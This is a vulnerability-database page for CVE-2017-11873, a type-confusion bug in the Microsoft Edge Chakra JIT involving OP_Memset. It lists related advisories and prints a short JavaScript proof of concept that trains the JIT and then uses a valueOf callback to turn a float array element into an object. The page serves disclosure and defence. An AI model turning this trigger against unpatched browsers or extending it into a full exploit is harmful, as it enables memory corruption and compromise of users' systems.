Microsoft Edge: Chakra: JIT: Bailouts must be generated for OP_Memset(CVE-2017-11873)

🗓️ 16 Nov 2017 00:00:00Reported by RootType

Microsoft Edge Chakra JIT Bailouts for OP_Memse

Reporter	Title	Published	Views	Family All 62
0day.today	Microsoft Edge Chakra JIT - OP_Memset Type Confusion Exploit	17 Nov 201700:00	–	zdt
ATTACKERKB	CVE-2017-11841	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11861	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11846	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11840	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11871	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11858	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11837	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11866	15 Nov 201703:29	–	attackerkb
ATTACKERKB	CVE-2017-11870	15 Nov 201703:29	–	attackerkb


                                                function opt(a, b, v) {
    if (b.length < 1)
        return;

    for (let i = 0; i < a.length; i++)
        a[i] = v;

    b[0] = 2.3023e-320;
}

function main() {
    for (let i = 0; i < 1000; i++) {
        opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
    }

    let a = new Uint8Array(100);
    let b = [1.1, 2.2, 3.3];
    opt(a, b, {
        valueOf: () => {
            b[0] = {};
            return 0;
        }
    });

    print(b[0]);
}

main();

16 Nov 2017 00:00Current

7.4High risk

Vulners AI Score7.4

EPSS0.76107